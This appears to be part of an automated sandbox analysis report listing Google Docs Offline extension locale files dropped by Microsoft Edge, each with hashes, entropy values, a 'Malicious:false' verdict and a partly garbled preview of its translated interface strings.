                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):978
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):907
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):937
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1337
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2846
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):934
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):963
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1320
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):884
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):980
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1941
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1969
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                Malicious:false
